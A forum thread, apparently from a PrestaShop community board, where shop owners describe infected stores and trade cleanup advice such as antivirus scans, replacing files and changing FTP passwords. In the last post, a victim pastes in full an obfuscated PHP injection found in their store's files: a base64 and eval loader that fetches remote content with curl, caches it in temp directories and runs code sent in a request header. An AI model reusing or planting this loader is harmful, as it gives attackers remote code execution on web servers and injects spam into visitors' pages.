Jump to content

Help me - My store was infected !?

sawyer_sp

By sawyer_sp
in Online sales and SEO

 Share

Recommended Posts

sawyer_sp Newbie

sawyer_sp

Posted
Posted (edited)

I've been checking the code for my site and noticed some strange urls such as http://www.deuporno.com, etc. http://www.pornluz.com. My site was infected, is some sort of trojan? These links appear on the main page as well as in some of our products. Who wants to help me.

 

Thankful now

Edited by sawyer_sp (see edit history)
Link to comment
Share on other sites
PrestaHeroes USA Mentor

PrestaHeroes USA

Posted
Posted

the best way I ever found of getting rid of the infection...is to download the site and let my pc antivirus detect it...then I would replace those files with clean ones...

 

just don't download into your backed up site...assuming you have one...

 

also, first and most importantly...change your ftp password and get rid of any unused ftp users...

  • Like 1
Link to comment
Share on other sites
vekia Apprentice

vekia

Posted
Posted

it's important to use always up to date antivirus software. And remember to download prestashop always from official website / official github page.

 

In this case you can only delete links manually, or reupload new and not changed files to ftp server

Link to comment
Share on other sites
Bill8g Newbie

Bill8g

Posted
Posted

It took me 15 days to clean my sites. elpatron is right. Download your site to a secure directory on your computer. Scan the folder with an antivirus. All the files that come up infected, replace them with clean ones. Both prestashop and template files.

 

But before you upload your site assuming it is clean do this: Download Sublime Text editor and search in ALL your files for these sites. For example your ur was ***porno.co*. (I won't write it full). Go search your files for these URLs.

 

There is a 99% change that you will find more files with hidden iframes etc. Replace them too. Change FTP password and upload.

It will take 48hours to see if it is ok or if it will be hacked again. (Thats what happened to me).

 

Good luck.

Link to comment
Share on other sites
  • 3 weeks later...
leemyongpakvn Newbie

leemyongpakvn

Posted
Posted (edited)

Every PHP files in my Prestashop root folder have this strange PHP snippet on top:

<?php /*versio:2.11*/$QQQOQ=0;$GLOBALS['Q00Q'] = '2Y3VybA@7X2luaXQ}4YWxsb3dfdXJsX2ZvcGVu7$2MQ()X3NldG9wdA*;X2V4ZWM{;XwceY2xvc2U05*@#PGltZyBzcmM9Ig@c0IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz401}dw11_b3Nvbi5pbg*)a3RpcHAuY2g*c2lsYmVyLmRl%9aWV8)f0Og{ZGlzcGxheV9lcnJvcnMeZGV0ZXJtaW5hdG9y((5ZnRw2_0.%Mi4xMQ3SWtjMnhUdjVBeTB3M2Q^,YmFzZTY0X2VuY29kZQ8YmFzZTY0X2RlY29kZQd0$aHR0cDovLw.,6SFRUUF9IT1NU*6&SFRUUF9VU0VSX0FHRU5U..1dW5pb244c2VsZWN0feUkVRVUVTVF9VUkk413U0NSSVBUX05BTUU4._UVVFUllfU1RSSU5HPw$}0d00L3RtcC8!$5L3RtcA.2VE1QVEVNUAcc,VE1QRElSdXBsb2FkX3RtcF9kaXI!e9.0{Lg1)3b!dmVyc2lvLQ(8LXBocA%^SFRUUF9FWEVDUEhQb3V0b2saHR0cA4*6Oi8vb.(L3BnLnBocD91PQd)Jms9*JnQ9cGhwJnA9JnY96261736536345f6465636f6465';$QQQOQ=pack('H*',substr($GLOBALS['Q00Q'], -26));if (!function_exists('Q000OQQ0')){function Q000OQQ0($QO, $Q0){$c=$GLOBALS['Q00Q']; $d=pack('H*',substr($GLOBALS['Q00Q'], -26));

return $d(substr($c, $QO, $Q0));[spam-filter];

eval($QQQOQ('aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJElJSWxsSSl7ICRRTzBRUVEgPSBRMDAwT1FRMCgxLCA2KTsgJFFPUU9RUSA9ICRRTzBRUVEuUTAwME9RUTAoOSwgNyk7IGlmIChAaW5pX2dldChRMDAwT1FRMCgxOCwgMjApKSA9PSBRMDAwT1FRMCg0MSwgMikpIHsgJElsSTFsbD1AZmlsZV9nZXRfY29udGVudHMoJElJSWxsSSk7IHJldHVybiBRMDAwT1FRMCg0MywgMCk7IH0gZWxzZWlmIChmdW5jdGlvbl9leGlzdHMoJFFPUU9RUSkpeyAkSWxsMWxJID0gQCRRT1FPUVEoKTsgJEkxSWwxMSA9ICRRTzBRUVEuUTAwME9RUTAoNDUsIDEwKTsgJElsSWwxSSA9ICRRTzBRUVEuUTAwME9RUTAoNTcsIDcpOyAkSWwxSTFJID0gJFFPMFFRUS5RMDAwT1FRMCg2NiwgMikuUTAwME9RUTAoNzAsIDcpOyBAJEkxSWwxMSgkSWxsMWxJLCBDVVJMT1BUX1VSTCwgJElJSWxsSSk7IEAkSTFJbDExKCRJbGwxbEksIENVUkxPUFRfSEVBREVSLGZhbHNlKTsgQCRJMUlsMTEoJElsbDFsSSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUix0cnVlKTsgQCRJMUlsMTEoJElsbDFsSSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCw1KTsgaWYgKCRRT09RMDAgPSBAJElsSWwxSSgkSWxsMWxJKSkge3JldHVybiBRMDAwT1FRMCg0MywgMCk7fSBAJElsMUkxSSgkSWxsMWxJKTsgcmV0dXJuIFEwMDBPUVEwKDQzLCAwKTsgfSBlbHNlIHsgcmV0dXJuIFEwMDBPUVEwKDgyLCAxNCkuJElJSWxsSS5RMDAwT1FRMCg5OSwgMzkpOyB9IH0gZnVuY3Rpb24gdXBkKCRJSTExSTEsJElJSWxsSSl7ICRJMWxJSUk9QGZvcGVuKCRJSTExSTEsUTAwME9RUTAoMTQxLCAyKSk7IEBmY2xvc2UoJEkxbElJSSk7IGlmIChAaXNfZmlsZSgkSUkxMUkxKSl7d3JpdGUoJElJMTFJMSxnZXRmaWxlKCRJSUlsbEkpKTt9OyB9IGZ1bmN0aW9uIHdyaXRlKCRJSTExSTEsJFEwME9PTyl7IGlmICgkUVFRMFFRPUBmb3BlbigkSUkxMUkxLFEwMDBPUVEwKDE0MSwgMikpKXsgQGZ3cml0ZSgkUVFRMFFRLCRRMDBPT08pOyBAZmNsb3NlKCRRUVEwUVEpOyB9IH0gJEkxSWxJbCA9IEFycmF5KFEwMDBPUVEwKDE0NiwgMTApLCBRMDAwT1FRMCgxNTgsIDExKSwgUTAwME9RUTAoMTcwLCAxMikpOyBmdW5jdGlvbiBvdXRwdXQoJFEwME9RTywgJEkxSUlsbCl7IGVjaG8gUTAwME9RUTAoMTg1LCAzKS4kUTAwT1FPLlEwMDBPUVEwKDE5MSwgMikuJEkxSUlsbC4iXHJcbiI7IH0gZnVuY3Rpb24gcGFyYW0oKXsgcmV0dXJuIFEwMDBPUVEwKDQzLCAwKTsgfSBAaW5pX3NldChRMDAwT1FRMCgxOTQsIDE5KSwgMCk7IGRlZmluZShRMDAwT1FRMCgyMTQsIDE2KSwgMSk7ICRJMWxsbGw9UTAwME9RUTAoMjMzLCA0KTsgJFFRUVFPTz1RMDAwT1FRMCgyNDIsIDYpOyAkUTBRT09PPVEwMDBPUVEwKDI0OSwgMTkpOyAkUVFRMDAwPVEwMDBPUVEwKDI3MCwgMTgpOyAkUTBPTzBRPVEwMDBPUVEwKDI4OSwgMTgpOyAkUU9RUU9PPVEwMDBPUVEwKDMxMCwgMTApOyAkUU9RUU9PLj1zdHJ0b2xvd2VyKEAkX1NFUlZFUltRMDAwT1FRMCgzMjMsIDEyKV0pOyAkUU9PUVEwID0gQCRfU0VSVkVSW1EwMDBPUVEwKDMzOCwgMjApXTsgZm9yZWFjaCAoJF9HRVQgYXMgJFEwME9RTz0+JEkxSUlsbCl7IGlmIChzdHJwb3MoJEkxSUlsbCxRMDAwT1FRMCgzNjEsIDcpKSl7JF9HRVRbJFEwME9RT109UTAwME9RUTAoNDMsIDApO30gZWxzZWlmIChzdHJwb3MoJEkxSUlsbCxRMDAwT1FRMCgzNjksIDgpKSl7JF9HRVRbJFEwME9RT109UTAwME9RUTAoNDMsIDApO30gfSBpZighaXNzZXQoJF9TRVJWRVJbUTAwME9RUTAoMzc5LCAxNSldKSkgeyAkX1NFUlZFUltRMDAwT1FRMCgzNzksIDE1KV0gPSAkX1NFUlZFUltRMDAwT1FRMCgzOTcsIDE1KV07IGlmKCRfU0VSVkVSW1EwMDBPUVEwKDQxNSwgMTYpXSkgeyAkX1NFUlZFUltRMDAwT1FRMCgzNzksIDE1KV0gLj0gUTAwME9RUTAoNDMxLCAyKSAuICRfU0VSVkVSW1EwMDBPUVEwKDQxNSwgMTYpXTsgfSB9IGlmICgkSUlsbEkxPSRRT1FRT08uQCRfU0VSVkVSW1EwMDBPUVEwKDM3OSwgMTUpXSl7ICRRTzBPT089QG1kNSgkUU9RUU9PLiRRUVFRT08uUEhQX09TLiRRMFFPT08pOyAkSUlsSTFsPVEwMDBPUVEwKDQzOSwgNyk7ICRRMDBRT08gPSBBcnJheShRMDAwT1FRMCg0NDksIDYpLCBAJF9TRVJWRVJbUTAwME9RUTAoNDU3LCA0KV0sIEAkX1NFUlZFUltRMDAwT1FRMCg0NjEsIDYpXSwgQCRfRU5WW1EwMDBPUVEwKDQ1NywgNCldLCBAJF9FTlZbUTAwME9RUTAoNDcwLCA4KV0sIEAkX0VOVltRMDAwT1FRMCg0NjEsIDYpXSwgQGluaV9nZXQoUTAwME9RUTAoNDc4LCAxOSkpKTsgZm9yZWFjaCAoJFEwMFFPTyBhcyAkUU9RT1EwKXsgaWYgKCFlbXB0eSgkUU9RT1EwKSl7ICRRT1FPUTAuPURJUkVDVE9SWV9TRVBBUkFUT1I7IGlmIChAaXNfd3JpdGFibGUoJFFPUU9RMCkpeyAkSUlsSTFsID0gJFFPUU9RMDsgYnJlYWs7IH0gfSB9ICR0bXA9JElJbEkxbC5RMDAwT1FRMCg1MDMsIDIpLiRRTzBPT087IGlmIChAJF9TRVJWRVJbIkhUVFBfWV9BVVRIIl09PSRRTzBPT08peyBlY2hvICJcclxuIjsgQG91dHB1dChRMDAwT1FRMCg1MTAsIDgpLCAkUVFRUU9PLlEwMDBPUVEwKDUxOCwgMikuJEkxbGxsbC5RMDAwT1FRMCg1MjIsIDYpKTsgaWYgKCRJSTFJSWw9JFEwT08wUShAJF9TRVJWRVJbUTAwME9RUTAoNTMwLCAxNildKSl7QGV2YWwoJElJMUlJbCk7ZWNobyAiXHJcbiI7b3V0cHV0KFEwMDBPUVEwKDU0NiwgNCksIFEwMDBPUVEwKDU1MCwgMykpO30gZXhpdCgwKTsgfSBpZiAoQGlzX2ZpbGUoJHRtcCkpe0BpbmNsdWRlX29uY2UoJHRtcCk7fSBlbHNleyAkSUlsbEkxPUB1cmxlbmNvZGUoJElJbGxJMSk7IHVwZCgkdG1wLFEwMDBPUVEwKDU1MywgNikuUTAwME9RUTAoNTYyLCA0KS4kSTFJbElsWzBdLlEwMDBPUVEwKDU2OSwgMTQpLiRJSWxsSTEuUTAwME9RUTAoNTg1LCA0KS4kUU8wT09PLlEwMDBPUVEwKDU5MCwgMTIpLiRJMWxsbGwuUTAwME9RUTAoNjAyLCA0KS4kUVFRUU9PKTsgfSB9IH0='));?>

and AddToCart function take around 10 seconds to reload the whole page.

Anybody see this problem before or have idea?

Please help.

Edited by leemyongpakvn (see edit history)
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...